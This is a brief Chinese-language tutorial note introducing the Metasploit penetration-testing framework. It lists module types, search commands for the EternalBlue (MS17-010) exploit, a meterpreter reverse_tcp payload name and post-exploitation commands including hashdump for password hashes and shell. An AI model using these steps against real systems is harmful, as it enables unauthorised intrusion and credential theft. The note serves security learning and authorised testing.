它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
我们能够通过它发现漏洞并进行快速实施攻击,当然需要在授权的情况下。
综合渗透测试框架
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploxits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多的信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
搜索应用:ms17(永恒之蓝)
search ms17
search name:ms17 type:exploit
MSF常用模块
Auxiliary模块:show auxiliary
命名规则:功能/服务/名称,scanner/smb/smb_ms17_010
Exploitx模块:show exploits
rank 表示好用级别:normal(正常),excellent(优秀),good(良好),average(平均)
命名规则:操作系统/服务/名称 windows/smb/ms17_010_eternalbule
payload模块:show payloads
命名规则:操作系统/类型/名称 windows/x64/meterpreter/reverse_tcp
MSF攻击基本流程
扫描靶机以及扫描:
攻击靶机以及选择payload以及攻击:
攻击成功得到meterpreter的会话:
查看用户权限:getuid
获取hash密码:hashdump
上传文件:upload
执行文件:execute -f notepad.exe
获取shell:shell